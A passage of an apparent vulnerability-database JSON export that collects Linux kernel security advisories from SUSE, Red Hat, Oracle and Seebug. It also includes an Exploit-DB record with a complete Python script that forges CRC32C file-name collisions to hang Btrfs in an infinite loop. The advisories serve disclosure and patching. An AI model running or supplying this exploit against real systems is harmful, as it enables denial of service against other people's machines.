check firmware content sooner (bnc#805371).\n * r8169: support new firmware format (bnc#805371).\n * r8169: explicit firmware format check (bnc#805371).\n *\n\n r8169: move the firmware down into the device private\n data (bnc#805371).\n\n *\n\n patches.fixes/mm-link_mem_sections-touch-nmi-watchdog.patch:\n mm: link_mem_sections make sure nmi watchdog does not\n trigger while linking memory sections (bnc#820434).\n\n *\n\n drm/i915: fix long-standing SNB regression in power\n consumption after resume v2 (bnc#801341).\n\n *\n\n RTC: Add an alarm disable quirk (bnc#805740).\n\n *\n\n drm/i915: Fix bogus hotplug warnings at resume\n (bnc#828087).\n\n * drm/i915: Serialize all register access\n (bnc#809463,bnc#812274,bnc#822878,bnc#828914).\n * drm/i915: Resurrect ring kicking for semaphores,\n selectively (bnc#828087).\n * drm/i915: Fix bogus hotplug warnings at resume\n (bnc#828087).\n * drm/i915: Serialize all register access\n (bnc#809463,bnc#812274,bnc#822878,bnc#828914).\n *\n\n drm/i915: Resurrect ring kicking for semaphores,\n selectively (bnc#828087).\n\n *\n\n drm/i915: use lower aux clock divider on non-ULT HSW\n (bnc#800875).\n\n * drm/i915: preserve the PBC bits of TRANS_CHICKEN2\n (bnc#828087).\n * drm/i915: set CPT FDI RX polarity bits based on VBT\n (bnc#828087).\n * drm/i915: hsw: fix link training for eDP on port-A\n (bnc#800875).\n * drm/i915: use lower aux clock divider on non-ULT HSW\n (bnc#800875).\n * drm/i915: preserve the PBC bits of TRANS_CHICKEN2\n (bnc#828087).\n * drm/i915: set CPT FDI RX polarity bits based on VBT\n (bnc#828087).\n *\n\n drm/i915: hsw: fix link training for eDP on port-A\n (bnc#800875).\n\n *\n\n patches.arch/s390-66-02-smp-ipi.patch: kernel: lost\n IPIs on CPU hotplug (bnc#825048, LTC#94784).\n\n *\n\n patches.fixes/iwlwifi-use-correct-supported-firmware-for-603\n 5-and-.patch: iwlwifi: use correct supported firmware for\n 6035 and 6000g2 (bnc#825887).\n\n *\n\n patches.fixes/watchdog-update-watchdog_thresh-atomically.pat\n ch: watchdog: Update watchdog_thresh atomically\n (bnc#829357).\n\n *\n patches.fixes/watchdog-update-watchdog_tresh-properly.patch:\n watchdog: update watchdog_tresh properly (bnc#829357).\n *\n\n patches.fixes/watchdog-make-disable-enable-hotplug-and-preem\n pt-save.patch:\n watchdog-make-disable-enable-hotplug-and-preempt-save.patch\n (bnc#829357).\n\n *\n\n kabi/severities: Ignore changes in drivers/hv\n\n *\n\n patches.drivers/lpfc-return-correct-error-code-on-bsg_timeou\n t.patch: lpfc: Return correct error code on bsg_timeout\n (bnc#816043).\n\n *\n\n patches.fixes/dm-drop-table-reference-on-ioctl-retry.patch:\n dm-multipath: Drop table when retrying ioctl (bnc#808940).\n\n *\n\n scsi: Do not retry invalid function error\n (bnc#809122).\n\n *\n\n patches.suse/scsi-do-not-retry-invalid-function-error.patch:\n scsi: Do not retry invalid function error (bnc#809122).\n\n *\n\n scsi: Always retry internal target error (bnc#745640,\n bnc#825227).\n\n *\n\n patches.suse/scsi-always-retry-internal-target-error.patch:\n scsi: Always retry internal target error (bnc#745640,\n bnc#825227).\n\n *\n\n patches.drivers/drm-edid-Don-t-print-messages-regarding-ster\n eo-or-csync-by-default.patch: Refresh: add upstream commit\n ID.\n\n *\n\n patches.suse/acpiphp-match-to-Bochs-dmi-data.patch:\n Refresh. (bnc#824915).\n\n *\n\n Refresh\n patches.suse/acpiphp-match-to-Bochs-dmi-data.patch\n (bnc#824915).\n\n *\n\n Update kabi files.\n\n *\n\n ACPI:remove panic in case hardware has changed after\n S4 (bnc#829001).\n\n *\n\n ibmvfc: Driver version 1.0.1 (bnc#825142).\n\n * ibmvfc: Fix for offlining devices during error\n recovery (bnc#825142).\n * ibmvfc: Properly set cancel flags when cancelling\n abort (bnc#825142).\n * ibmvfc: Send cancel when link is down (bnc#825142).\n * ibmvfc: Support FAST_IO_FAIL in EH handlers\n (bnc#825142).\n *\n\n ibmvfc: Suppress ABTS if target gone (bnc#825142).\n\n *\n\n fs/dcache.c: add cond_resched() to\n shrink_dcache_parent() (bnc#829082).\n\n *\n\n drivers/cdrom/cdrom.c: use kzalloc() for failing\n hardware (bnc#824295, CVE-2013-2164).\n\n *\n\n kmsg_dump: do not run on non-error paths by default\n (bnc#820172).\n\n *\n\n supported.conf: mark tcm_qla2xxx as supported\n\n *\n\n mm: honor min_free_kbytes set by user (bnc#826960).\n\n *\n\n Drivers: hv: util: Fix a bug in version negotiation\n code for util services (bnc#828714).\n\n *\n\n hyperv: Fix a kernel warning from\n netvsc_linkstatus_callback() (bnc#828574).\n\n *\n\n RT: Fix up hardening patch to not gripe when avg &gt;\n available, which lockless access makes possible and happens\n in -rt kernels running a cpubound ltp realtime testcase.\n Just keep the output sane in that case.\n\n *\n\n kabi/severities: Add exception for\n aer_recover_queue() There should not be any user besides\n ghes.ko.\n\n *\n\n Fix rpm changelog\n\n *\n\n PCI / PM: restore the original behavior of\n pci_set_power_state() (bnc#827930).\n\n *\n\n fanotify: info leak in copy_event_to_user()\n (CVE-2013-2148 bnc#823517).\n\n *\n\n usb: xhci: check usb2 port capabilities before adding\n hw link PM support (bnc#828265).\n\n *\n\n aerdrv: Move cper_print_aer() call out of interrupt\n context (bnc#822052, bnc#824568).\n\n *\n\n PCI/AER: pci_get_domain_bus_and_slot() call missing\n required pci_dev_put() (bnc#822052, bnc#824568).\n\n *\n\n patches.fixes/block-do-not-pass-disk-names-as-format-strings\n .patch: block: do not pass disk names as format strings\n (bnc#822575 CVE-2013-2851).\n\n *\n\n powerpc: POWER8 cputable entries (bnc#824256).\n\n *\n\n libceph: Fix NULL pointer dereference in auth client\n code. (CVE-2013-1059, bnc#826350)\n\n *\n\n md/raid10: Fix two bug affecting RAID10 reshape.\n\n *\n\n Allow NFSv4 to run execute-only files (bnc#765523).\n\n *\n\n fs/ocfs2/namei.c: remove unecessary ERROR when\n removing non-empty directory (bnc#819363).\n\n *\n\n block: Reserve only one queue tag for sync IO if only\n 3 tags are available (bnc#806396).\n\n *\n\n btrfs: merge contigous regions when loading free\n space cache\n\n *\n\n btrfs: fix how we deal with the orphan block rsv.\n\n * btrfs: fix wrong check during log recovery.\n * btrfs: change how we indicate we are adding csums.\n", "edition": 1, "modified": "2013-09-21T00:04:17", "published": "2013-09-21T00:04:17", "id": "SUSE-SU-2013:1473-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-09/msg00003.html", "title": "Security update for Linux kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2058", "CVE-2013-2141", "CVE-2013-2146", "CVE-2013-2147", "CVE-2013-2148", "CVE-2013-2164", "CVE-2013-2232", "CVE-2013-2234", "CVE-2013-2237", "CVE-2013-2850", "CVE-2013-2851", "CVE-2013-2852", "CVE-2013-3301", "CVE-2013-4162", "CVE-2013-4163"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A heap-based buffer overflow flaw was found in the Linux kernel's iSCSI\ntarget subsystem. A remote attacker could use a specially-crafted iSCSI\nrequest to cause a denial of service on a system or, potentially, escalate\ntheir privileges on that system. (CVE-2013-2850, Important)\n\n* A flaw was found in the Linux kernel's Performance Events implementation.\nOn systems with certain Intel processors, a local, unprivileged user could\nuse this flaw to cause a denial of service by leveraging the perf subsystem\nto write into the reserved bits of the OFFCORE_RSP_0 and OFFCORE_RSP_1\nmodel-specific registers. (CVE-2013-2146, Moderate)\n\n* An invalid pointer dereference flaw was found in the Linux kernel's\nTCP/IP protocol suite implementation. A local, unprivileged user could use\nthis flaw to crash the system or, potentially, escalate their privileges on\nthe system by using sendmsg() with an IPv6 socket connected to an IPv4\ndestination. (CVE-2013-2232, Moderate)\n\n* Two flaws were found in the way the Linux kernel's TCP/IP protocol suite\nimplementation handled IPv6 sockets that used the UDP_CORK option. A local,\nunprivileged user could use these flaws to cause a denial of service.\n(CVE-2013-4162, CVE-2013-4163, Moderate)\n\n* A flaw was found in the Linux kernel's Chipidea USB driver. A local,\nunprivileged user could use this flaw to cause a denial of service.\n(CVE-2013-2058, Low)\n\n* Information leak flaws in the Linux kernel could allow a privileged,\nlocal user to leak kernel memory to user-space. (CVE-2013-2147,\nCVE-2013-2164, CVE-2013-2234, CVE-2013-2237, Low)\n\n* Information leak flaws in the Linux kernel could allow a local,\nunprivileged user to leak kernel memory to user-space. (CVE-2013-2141,\nCVE-2013-2148, Low)\n\n* A format string flaw was found in the Linux kernel's block layer. A\nprivileged, local user could potentially use this flaw to escalate their\nprivileges to kernel level (ring0). (CVE-2013-2851, Low)\n\n* A format string flaw was found in the b43_do_request_fw() function in the\nLinux kernel's b43 driver implementation. A local user who is able to\nspecify the \"fwpostfix\" b43 module parameter could use this flaw to cause a\ndenial of service or, potentially, escalate their privileges.\n(CVE-2013-2852, Low)\n\n* A NULL pointer dereference flaw was found in the Linux kernel's ftrace\nand function tracer implementations. A local user who has the CAP_SYS_ADMIN\ncapability could use this flaw to cause a denial of service.\n(CVE-2013-3301, Low)\n\nRed Hat would like to thank Kees Cook for reporting CVE-2013-2850,\nCVE-2013-2851, and CVE-2013-2852; and Hannes Frederic Sowa for reporting\nCVE-2013-4162 and CVE-2013-4163.\n\nThis update also fixes the following bugs:\n\n* The following drivers have been updated, fixing a number of bugs:\nmyri10ge, bna, enic, mlx4, bgmac, bcma, cxgb3, cxgb4, qlcnic, r8169,\nbe2net, e100, e1000, e1000e, igb, ixgbe, brcm80211, cpsw, pch_gbe,\nbfin_mac, bnx2x, bnx2, cnic, tg3, and sfc. (BZ#974138)\n\n* The realtime kernel was not built with the CONFIG_NET_DROP_WATCH kernel\nconfiguration option enabled. As such, attempting to run the dropwatch\ncommand resulted in the following error:\n\nUnable to find NET_DM family, dropwatch can't work\nCleaning up on socket creation error\n\nWith this update, the realtime kernel is built with the\nCONFIG_NET_DROP_WATCH option, allowing dropwatch to work as expected.\n(BZ#979417)\n\nUsers should upgrade to these updated packages, which upgrade the kernel-rt\nkernel to version kernel-rt-3.6.11.5-rt37, and correct these issues. The\nsystem must be rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:34", "published": "2013-09-16T04:00:00", "id": "RHSA-2013:1264", "href": "https://access.redhat.com/errata/RHSA-2013:1264", "type": "redhat", "title": "(RHSA-2013:1264) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T07:23:33", "description": "Linux Kernel 3.3.5 Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability. CVE-2012-5375. Dos exploit for linux platform", "published": "2012-12-13T00:00:00", "type": "exploitdb", "title": "Linux Kernel <= 3.3.5 Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-5375"], "modified": "2012-12-13T00:00:00", "id": "EDB-ID:38132", "href": "https://www.exploit-db.com/exploits/38132/", "sourceData": "source: http://www.securityfocus.com/bid/56939/info\r\n\r\nThe Linux kernel is prone to a local denial-of-service vulnerability.\r\n\r\nAttackers can exploit this issue to cause an infinite loop, resulting in a denial-of-service condition. \r\n\r\n#!/usr/bin/env python\r\n\r\n## Borrows code from\r\n\"\"\"Calculate and manipulate CRC32.\r\nhttp://en.wikipedia.org/wiki/Cyclic_redundancy_check\r\n-- StalkR\r\n\"\"\"\r\n## See https://github.com/StalkR/misc/blob/master/crypto/crc32.py\r\n\r\nimport struct\r\nimport sys\r\nimport os\r\n\r\n# Polynoms in reversed notation\r\nPOLYNOMS = {\r\n 'CRC-32-IEEE': 0xedb88320, # 802.3\r\n 'CRC-32C': 0x82F63B78, # Castagnoli\r\n 'CRC-32K': 0xEB31D82E, # Koopman\r\n 'CRC-32Q': 0xD5828281,\r\n}\r\n\r\nclass CRC32(object):\r\n \"\"\"A class to calculate and manipulate CRC32.\r\nUse one instance per type of polynom you want to use.\r\nUse calc() to calculate a crc32.\r\nUse forge() to forge crc32 by adding 4 bytes anywhere.\r\n\"\"\"\r\n def __init__(self, type=\"CRC-32C\"):\r\n if type not in POLYNOMS:\r\n raise Error(\"Unknown polynom. %s\" % type)\r\n self.polynom = POLYNOMS[type]\r\n self.table, self.reverse = [0]*256, [0]*256\r\n self._build_tables()\r\n\r\n def _build_tables(self):\r\n for i in range(256):\r\n fwd = i\r\n rev = i << 24\r\n for j in range(8, 0, -1):\r\n # build normal table\r\n if (fwd & 1) == 1:\r\n fwd = (fwd >> 1) ^ self.polynom\r\n else:\r\n fwd >>= 1\r\n self.table[i] = fwd & 0xffffffff\r\n # build reverse table =)\r\n if rev & 0x80000000 == 0x80000000:\r\n rev = ((rev ^ self.polynom) << 1) | 1\r\n else:\r\n rev <<= 1\r\n rev &= 0xffffffff\r\n self.reverse[i] = rev\r\n\r\n def calc(self, s):\r\n \"\"\"Calculate crc32 of a string.\r\n Same crc32 as in (binascii.crc32)&0xffffffff.\r\n \"\"\"\r\n crc = 0xffffffff\r\n for c in s:\r\n crc = (crc >> 8) ^ self.table[(crc ^ ord(c)) & 0xff]\r\n return crc^0xffffffff\r\n\r\n def forge(self, wanted_crc, s, pos=None):\r\n \"\"\"Forge crc32 of a string by adding 4 bytes at position pos.\"\"\"\r\n if pos is None:\r\n pos = len(s)\r\n\r\n # forward calculation of CRC up to pos, sets current forward CRC state\r\n fwd_crc = 0xffffffff\r\n for c in s[:pos]:\r\n fwd_crc = (fwd_crc >> 8) ^ self.table[(fwd_crc ^ ord(c)) & 0xff]\r\n\r\n # backward calculation of CRC up to pos, sets wanted backward CRC state\r\n bkd_crc = wanted_crc^0xffffffff\r\n for c in s[pos:][::-1]:\r\n bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)\r\n\r\n # deduce the 4 bytes we need to insert\r\n for c in struct.pack('<L',fwd_crc)[::-1]:\r\n bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ self.reverse[bkd_crc >> 24] ^ ord(c)\r\n\r\n res = s[:pos] + struct.pack('<L', bkd_crc) + s[pos:]\r\n return res\r\n\r\nif __name__=='__main__':\r\n\r\n hack = False\r\n ITERATIONS = 10\r\n crc = CRC32()\r\n wanted_crc = 0x00000000\r\n for i in range (ITERATIONS):\r\n for j in range(55):\r\n str = os.urandom (16).encode (\"hex\").strip (\"\\x00\")\r\n if hack:\r\n f = crc.forge(wanted_crc, str, 4)\r\n if (\"/\" not in f) and (\"\\x00\" not in f):\r\n file (f, 'a').close()\r\n else:\r\n file (str, 'a').close ()\r\n\r\n wanted_crc += 1", "cvss": {"score": 4.0, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38132/"}], "seebug": [{"lastseen": "2017-11-19T17:41:49", "description": "Bugtraq ID:60414\r\nCVE ID:CVE-2013-2140\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u6e90\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\u7531\u4e8e\u4e0d\u5145\u5206\u7684\u68c0\u67e5BLKIF_OP_DISCARD\u6743\u9650\uff0c\u5982\u679c\u7cfb\u7edf\u7ba1\u7406\u5458\u63d0\u4f9b\u4e00\u4e2a\u53ea\u8bfb\u6743\u9650\u7684\u78c1\u76d8\uff0c\u5141\u8bb8\u7279\u6743Guest\u7528\u6237\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u9650\u5236\u7834\u574f\u78c1\u76d8\u4e0a\u7684\u6570\u636e\u3002\n0\nLinux Kernel\n\u5382\u5546\u89e3\u51b3\u65b9\u6848 \r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u7b2c\u4e09\u65b9\u7684\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff1a\r\nhttp://seclists.org/oss-sec/2013/q2/att-488/0001-xen-blkback-Check-device-permissions-before-allowing.patch", "published": "2013-06-18T00:00:00", "title": "Linux Kernel 'dispatch_discard_io()'\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2140"], "modified": "2013-06-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60846", "id": "SSV:60846", "sourceData": "", "cvss": {"score": 3.8, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "oraclelinux": [{"lastseen": "2020-12-30T19:27:44", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-2206", "CVE-2013-2147", "CVE-2013-2232", "CVE-2013-2237", "CVE-2013-2224", "CVE-2013-2164"], "description": "kernel\n[2.6.18-348.16.1.0.1]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix endpoint device creation (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix refcount bug in endpoint removal (Junxiao Bi) [orabug 14795203]", "edition": 6, "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "ELSA-2013-1166-1", "href": "http://linux.oracle.com/errata/ELSA-2013-1166-1.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:44", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2234", "CVE-2013-2206", "CVE-2013-2147", "CVE-2013-2232", "CVE-2013-2237", "CVE-2013-2224", "CVE-2013-2164"], "description": "kernel\n[2.6.18-348.16.1]\n- [x86_64] Fix kdump failure due to 'x86_64: Early segment setup' (Paolo Bonzini) [988251 987244]\n- [xen] skip tracing if it was disabled instead of dying (Igor Mammedov) [987976 967053]\n- [ia64] fix KABI breakage on ia64 (Prarit Bhargava) [966878 960783]\n- [x86] fpu: fix CONFIG_PREEMPT=y corruption of FPU stack (Prarit Bhargava) [948187 731531]\n- [i386] add sleazy FPU optimization (Prarit Bhargava) [948187 731531]\n- [x86-64] non lazy 'sleazy' fpu implementation (Prarit Bhargava) [948187 731531]\n[2.6.18-348.15.1]\n- [fs] nfs: flush cached dir information slightly more readily (Scott Mayhew) [976441 853145]\n- [fs] nfs: Fix resolution prob with cache_change_attribute (Scott Mayhew) [976441 853145]\n- [fs] nfs: define function to update nfsi->cache_change_attribute (Scott Mayhew) [976441 853145]\n- [net] af_key: fix info leaks in notify messages (Jiri Benc) [980999 981000] {CVE-2013-2234}\n- [net] af_key: initialize satype in key_notify_policy_flush() (Jiri Benc) [981222 981224] {CVE-2013-2237}\n- [net] ipv6: ip6_sk_dst_check() must not assume ipv6 dst (Jiri Pirko) [981556 981557] {CVE-2013-2232}\n- [net] fix invalid free in ip_cmsg_send() callers (Petr Matousek) [980141 980142] {CVE-2013-2224}\n- [x86_64] Early segment setup for VT (Paolo Bonzini) [979920 978305]\n- [block] cpqarray: info leak in ida_locked_ioctl() (Tomas Henzl) [971245 971246] {CVE-2013-2147}\n- [block] cdrom: use kzalloc() for failing hardware (Frantisek Hrbata) [973103 973104] {CVE-2013-2164}\n- [mm] Break out when there is nothing more to write for the fs. (Larry Woodman) [972583 965359]\n[2.6.18-348.14.1]\n- [net] Fix panic for vlan over gre via tun (Thomas Graf) [983452 981337]\n- [x86] mm: introduce proper mem barriers smp_invalidate_interrupt (Rafael Aquini) [983628 865095]\n[2.6.18-348.13.1]\n- [net] sctp: Disallow new connection on a closing socket (Daniel Borkmann) [976569 974936] {CVE-2013-2206}\n- [net] sctp: Use correct sideffect command in dup cookie handling (Daniel Borkmann) [976569 974936] {CVE-2013-2206}\n- [net] sctp: deal with multiple COOKIE_ECHO chunks (Daniel Borkmann) [976569 974936] {CVE-2013-2206}\n- [net] tcp: bind() use stronger condition for bind_conflict (Flavio Leitner) [980811 957604]", "edition": 4, "modified": "2013-08-21T00:00:00", "published": "2013-08-21T00:00:00", "id": "ELSA-2013-1166", "href": "http://linux.oracle.com/errata/ELSA-2013-1166.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}]}